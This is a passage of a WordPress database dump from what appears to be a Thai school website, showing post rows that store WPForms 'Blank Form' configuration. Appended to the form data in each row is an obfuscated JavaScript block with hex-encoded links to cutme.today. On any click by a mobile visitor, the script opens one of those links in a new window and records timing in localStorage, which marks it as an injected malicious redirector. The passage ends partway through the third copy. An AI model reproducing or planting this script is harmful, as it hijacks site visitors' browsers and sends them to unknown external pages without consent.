(1102,1,'2024-09-05 20:26:54','2024-09-05 13:26:54','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d\",\"format\":\"first-last\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32\\u0e43\\u0e2a\\u0e48\\u0e0a\\u0e37\\u0e48\\u0e2d \",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"1102\",\"field_id\":3,\"settings\":{\"form_title\":\"Blank Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Blank Form Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','Blank Form','','publish','closed','closed','','blank-form','','','2024-09-05 20:29:38','2024-09-05 13:29:38','',0,'http://pakhaeng.ssk.in.th/?post_type=wpforms&#038;p=1102',0,'wpforms','',0),
(1103,1,'2024-09-05 20:26:59','2024-09-05 13:26:59','{\"fields\":[],\"id\":\"1102\",\"field_id\":1,\"settings\":{\"form_title\":\"Blank Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Blank Form Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','Blank Form','','inherit','closed','closed','','1102-revision-v1','','','2024-09-05 20:26:59','2024-09-05 13:26:59','',1102,'http://pakhaeng.ssk.in.th/?p=1103',0,'revision','',0),
(1104,1,'2024-09-05 20:29:23','2024-09-05 13:29:23','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d\",\"format\":\"first-last\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32\\u0e43\\u0e2a\\u0e48\\u0e0a\\u0e37\\u0e48\\u0e2d \",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"1102\",\"field_id\":3,\"settings\":{\"form_title\":\"Blank Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Blank Form Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function 